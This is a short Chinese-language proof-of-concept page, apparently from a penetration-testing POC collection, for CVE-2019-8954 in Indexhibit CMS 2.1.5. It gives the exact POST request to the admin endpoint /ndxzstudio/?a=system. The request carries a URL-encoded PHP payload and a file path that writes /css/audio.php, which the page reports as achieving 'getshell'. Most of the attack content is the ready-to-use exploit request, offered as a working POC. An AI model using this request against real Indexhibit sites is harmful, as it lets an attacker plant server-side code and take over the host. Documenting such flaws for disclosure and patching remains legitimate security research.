Penetration_Testing_POC/indexhibit cms v2.1.5 直接编辑php文件getshell.md
2019-07-24 19:29:08 +08:00

25 lines
938 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

### 漏洞简介
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|indexhibit cms v2.1.5 直接编辑php文件getshell|2019-02-20|yc3365487579@qq.com|[https://www.indexhibit.org/](https://www.indexhibit.org/) | [https://www.indexhibit.org/](https://www.indexhibit.org/) |v2.1.5| [CVE-2019-8954](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8954)|
#### 漏洞概述
> indexhibit CMS 2.1.5版本存在一个直接编辑php文件的漏洞导致getshell。
### POC实现代码如下
> 当我们登录进后台后,向/ndxzstudio/?a=system
> post数据
``` raw
upd_jxcode=true&v=%253C%253Fphp%2520phpinfo()%253B%253F%253E&id=%2Fcss%2Faudio.php
```
> 即可在/css/目录写入一个php文件audio.php。
![POST数据](img/7.png)
> 成功getshell
![POST数据](img/8.png)